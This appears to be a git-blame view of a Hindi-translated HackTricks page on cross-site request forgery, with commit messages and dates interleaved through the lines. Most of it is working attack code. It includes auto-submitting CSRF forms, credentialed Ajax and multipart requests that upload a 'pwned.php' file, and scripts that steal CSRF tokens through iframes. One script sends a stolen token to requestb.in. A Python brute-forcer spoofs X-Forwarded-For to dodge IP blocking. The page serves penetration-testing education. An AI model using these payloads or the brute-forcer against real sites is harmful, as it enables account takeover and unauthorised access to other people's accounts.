 								<video src="...">
 								<source src="..." type="...">
 								<video poster="...">
 								<link rel="stylesheet" href="...">
 								<object data="...">
 								<body background="...">
 								<div style="background: url('...');"></div>
 								<style>
 								body { background: url('...'); }
 								</style>
 								<bgsound src="...">
 								<track src="..." kind="subtitles">
 								<input type="image" src="..." alt="Submit Button">
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### फ़ॉर्म GET अनुरोध
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<html>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<!-- CSRF PoC - generated by Burp Suite Professional -->
 								<body>
 								<script>history.pushState('', '', '/')</script>
 								<form method="GET" action="https://victim.net/email/change-email">
 								<input type="hidden" name="email" value="some@email.com" />
 								<input type="submit" value="Submit request" />
 								</form>
 								<script>
 								document.forms[0].submit();
 								</script>
 								</body>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</html>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### फ़ॉर्म POST अनुरोध
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<html>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<body>
 								<script>history.pushState('', '', '/')</script>
 								<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
 								<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
 								<input type="submit" value="Submit request" />
 								<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
 								</form>
 								<script>
 								document.forms[0].submit(); //Way 3 to autosubmit
 								</script>
 								</body>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</html>
-												GitBook: [master] one page modified
											
										
										
											2021-06-04 23:20:57 +00:00
+								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### iframe के माध्यम से फ़ॉर्म POST अनुरोध
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<!--
 								The request is sent through the iframe withuot reloading the page
-												GitBook: [master] one page modified
											
										
										
											2021-06-04 23:20:57 +00:00
+								-->
 								<html>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<body>
 								<iframe style="display:none" name="csrfframe"></iframe>
 								<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
 								<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
 								<input type="submit" value="Submit request" />
 								</form>
 								<script>
 								document.forms[0].submit();
 								</script>
 								</body>
-												GitBook: [master] one page modified
											
										
										
											2021-06-04 23:20:57 +00:00
+								</html>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### **Ajax POST अनुरोध**
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<script>
 								var xh;
 								if (window.XMLHttpRequest)
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								{// code for IE7+, Firefox, Chrome, Opera, Safari
 								xh=new XMLHttpRequest();
 								}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								else
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								{// code for IE6, IE5
 								xh=new ActiveXObject("Microsoft.XMLHTTP");
 								}
-												GitBook: [master] one page modified
											
										
										
											2021-06-05 01:10:15 +00:00
+								xh.withCredentials = true;
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
 								xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
 								xh.send("username=abcd&status=on");
 								</script>
-												GitBook: [master] one page modified
											
										
										
											2021-06-05 01:10:15 +00:00
 								<script>
 								//JQuery version
 								$.ajax({
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								type: "POST",
 								url: "https://google.com",
 								data: "param=value&param2=value2"
-												GitBook: [master] one page modified
											
										
										
											2021-06-05 01:10:15 +00:00
+								})
 								</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								### multipart/form-data POST अनुरोध
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								myFormData = new FormData();
 								var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
 								myFormData.append("newAttachment", blob, "pwned.php");
 								fetch("http://example/some/path", {
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								method: "post",
 								body: myFormData,
 								credentials: "include",
 								headers: {"Content-Type": "application/x-www-form-urlencoded"},
 								mode: "no-cors"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								});
 								```
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								### multipart/form-data POST अनुरोध v2
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								// https://www.exploit-db.com/exploits/20009
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								var fileSize = fileData.length,
 								boundary = "OWNEDBYOFFSEC",
 								xhr = new XMLHttpRequest();
-												GitBook: [master] one page modified
											
										
										
											2021-06-05 01:10:15 +00:00
+								xhr.withCredentials = true;
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								xhr.open("POST", url, true);
 								//  MIME POST request.
 								xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
 								xhr.setRequestHeader("Content-Length", fileSize);
 								var body = "--" + boundary + "\r\n";
 								body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
 								body += "Content-Type: " + ctype + "\r\n\r\n";
 								body += fileData + "\r\n";
 								body += "--" + boundary + "--";
 								//xhr.send(body);
 								xhr.sendAsBinary(body);
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### एक iframe के भीतर Form POST अनुरोध
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<--! expl.html -->
 								<body onload="envia()">
 								<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
 								<input type="text" id="pwd" name="pwd" value="otra nueva">
 								</form>
 								<body>
 								<script>
 								function envia(){document.getElementById("formulario").submit();}
 								</script>
 								<!-- public.html -->
 								<iframe src="2-1.html" style="position:absolute;top:-5000">
 								</iframe>
 								<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
+								### **CSRF टोकन चुराएं और एक POST अनुरोध भेजें**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```javascript
 								function submitFormWithTokenJS(token) {
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								var xhr = new XMLHttpRequest();
 								xhr.open("POST", POST_URL, true);
 								xhr.withCredentials = true;
 								// Send the proper header information along with the request
 								xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								// This is for debugging and can be removed
 								xhr.onreadystatechange = function() {
 								if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
 								//console.log(xhr.responseText);
 								}
 								}
 								xhr.send("token=" + token + "&otherparama=heyyyy");
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								function getTokenJS() {
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								var xhr = new XMLHttpRequest();
 								// This tels it to return it as a HTML document
 								xhr.responseType = "document";
 								xhr.withCredentials = true;
 								// true on the end of here makes the call asynchronous
 								xhr.open("GET", GET_URL, true);
 								xhr.onload = function (e) {
 								if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
 								// Get the document from the response
 								page = xhr.response
 								// Get the input element
 								input = page.getElementById("token");
 								// Show the token
 								//console.log("The token is: " + input.value);
 								// Use the token to submit the form
 								submitFormWithTokenJS(input.value);
 								}
 								};
 								// Make the request
 								xhr.send(null);
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								var GET_URL="http://google.com?param=VALUE"
 								var POST_URL="http://google.com?param=VALUE"
 								getTokenJS();
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### **CSRF टोकन चुराएं और iframe, एक फॉर्म और Ajax का उपयोग करके एक पोस्ट अनुरोध भेजें**
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
 								<input type="text" name="username" value="AA">
 								<input type="checkbox" name="status" checked="checked">
 								<input id="token" type="hidden" name="token" value="" />
 								</form>
 								<script type="text/javascript">
 								function f1(){
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								x1=document.getElementById("i1");
 								x1d=(x1.contentWindow||x1.contentDocument);
 								t=x1d.document.getElementById("token").value;
 								document.getElementById("token").value=t;
 								document.getElementById("form1").submit();
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
 								```
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								### **CSRF टोकन चुराएं और iframe और एक फॉर्म का उपयोग करके एक POST अनुरोध भेजें**
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								function read()
 								{
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								var name = 'admin2';
 								var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
 								document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data">');
 								document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
 								document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
 								document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
 								document.writeln('</form>');
 								document.forms[0].submit.click();
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								</script>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### **टोकन चुराएं और इसे 2 iframes का उपयोग करके भेजें**
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<script>
 								var token;
 								function readframe1(){
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								token = frame1.document.getElementById("profile").token.value;
 								document.getElementById("bypass").token.value = token
 								loadframe2();
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								function loadframe2(){
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								var test = document.getElementbyId("frame2");
 								test.src = "http://requestb.in/1g6asbg1?token="+token;
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								</script>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
 								height="600" width="800"></iframe>
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<iframe id="frame2" name="frame2"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
 								height="600" width="800"></iframe>
 								<body onload="document.forms[0].submit()">
 								<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<input type="text" name="username" value="z">
 								<input type="checkbox" name="status" checked="">
 								<input id="token" type="hidden" name="token" value="0000" />
 								<button type="submit">Submit</button>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</form>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### **POSTAjax के साथ CSRF टोकन चुराएं और एक फॉर्म के साथ पोस्ट भेजें**
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<body onload="getData()">
 								<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								<input type="hidden" name="username" value="root"/>
 								<input type="hidden" name="status" value="on"/>
 								<input type="hidden" id="findtoken" name="token" value=""/>
 								<input type="submit" value="valider"/>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</form>
 								<script>
 								var x = new XMLHttpRequest();
 								function getData() {
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								x.withCredentials = true;
 								x.open("GET","http://google.com?param=VALUE",true);
 								x.send(null);
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								x.onreadystatechange = function() {
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								if (x.readyState == XMLHttpRequest.DONE) {
 								var token = x.responseText.match(/name="token" value="(.+)"/)[1];
 								document.getElementById("findtoken").value = token;
 								document.getElementById("form").submit();
 								}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								</script>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								### CSRF with Socket.IO
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								```html
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-06 20:38:54 +00:00
+								<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
 								<script>
 								let socket = io('http://six.jh2i.com:50022/test');
 								const username = 'admin'
 								socket.on('connect', () => {
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								console.log('connected!');
 								socket.emit('join', {
 								room: username
 								});
 								socket.emit('my_room_event', {
 								data: '!flag',
 								room: username
 								})
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-06 20:38:54 +00:00
 								});
 								</script>
 								```
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								## CSRF लॉगिन ब्रूट फोर्स
-												GitBook: [master] 357 pages modified
											
										
										
											2020-08-06 20:38:54 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								कोड का उपयोग CSRF टोकन का उपयोग करके एक लॉगिन फॉर्म को ब्रूट फोर्स करने के लिए किया जा सकता है (यह संभावित IP ब्लैकलिस्टिंग को बायपास करने के लिए X-Forwarded-For हेडर का भी उपयोग कर रहा है):
-												GitBook: [master] one page modified
											
										
										
											2020-11-06 18:22:38 +00:00
+								```python
 								import request
 								import re
 								import random
 								URL = "http://10.10.10.191/admin/"
 								PROXY = { "http": "127.0.0.1:8080"}
 								SESSION_COOKIE_NAME = "BLUDIT-KEY"
 								USER = "fergus"
 								PASS_LIST="./words"
 								def init_session():
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								#Return CSRF + Session (cookie)
 								r = requests.get(URL)
 								csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
 								csrf = csrf.group(1)
 								session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
 								return csrf, session_cookie
-												GitBook: [master] one page modified
											
										
										
											2020-11-06 18:22:38 +00:00
 								def login(user, password):
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								print(f"{user}:{password}")
 								csrf, cookie = init_session()
 								cookies = {SESSION_COOKIE_NAME: cookie}
 								data = {
 								"tokenCSRF": csrf,
 								"username": user,
 								"password": password,
 								"save": ""
 								}
 								headers = {
 								"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
 								}
 								r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
 								if "Username or password incorrect" in r.text:
 								return False
 								else:
 								print(f"FOUND {user} : {password}")
 								return True
-												GitBook: [master] one page modified
											
										
										
											2020-11-06 18:22:38 +00:00
 								with open(PASS_LIST, "r") as f:
-												Translated to Hindi

											
										
										
											2023-11-06 08:38:02 +00:00
+								for line in f:
 								login(USER, line.strip())
-												GitBook: [master] one page modified
											
										
										
											2020-11-06 18:22:38 +00:00
+								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								## Tools <a href="#tools" id="tools"></a>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
-												GitBook: [#3510] No subject

											
										
										
											2022-09-26 09:52:47 +00:00
+								* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								## References
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:37:38 +00:00
+								* [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
 								* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												GitBook: [#3633] No subject

											
										
										
											2022-10-27 23:22:18 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								<figure><img src="/.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								अनुभवी हैकर्स और बग बाउंटी शिकारियों के साथ संवाद करने के लिए [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) सर्वर में शामिल हों!
-												hp

											
										
										
											2023-07-14 15:03:41 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Hacking Insights**\
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								हैकिंग के रोमांच और चुनौतियों में गहराई से जाने वाले सामग्री के साथ जुड़ें
-												hp

											
										
										
											2023-02-27 09:28:45 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Real-Time Hack News**\
 								तेज-तर्रार हैकिंग दुनिया के साथ वास्तविक समय की समाचार और अंतर्दृष्टि के माध्यम से अद्यतित रहें
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								**Latest Announcements**\
 								नवीनतम बग बाउंटी लॉन्च और महत्वपूर्ण प्लेटफ़ॉर्म अपडेट के साथ सूचित रहें
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) और आज ही शीर्ष हैकर्स के साथ सहयोग करना शुरू करें!
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								{% hint style="success" %}
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								AWS Hacking सीखें और अभ्यास करें:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking सीखें और अभ्यास करें: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								<details>
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								<summary>Support HackTricks</summary>
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2024-11-19 12:34:11 +00:00
+								* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जांच करें!
 								* **💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या **Twitter** 🐦 पर हमें **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **हैकिंग ट्रिक्स साझा करें और** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) गिटहब रिपोजिटरी में PR सबमिट करें।
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 18:36:12 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 16:18:57 +00:00
+								{% endhint %}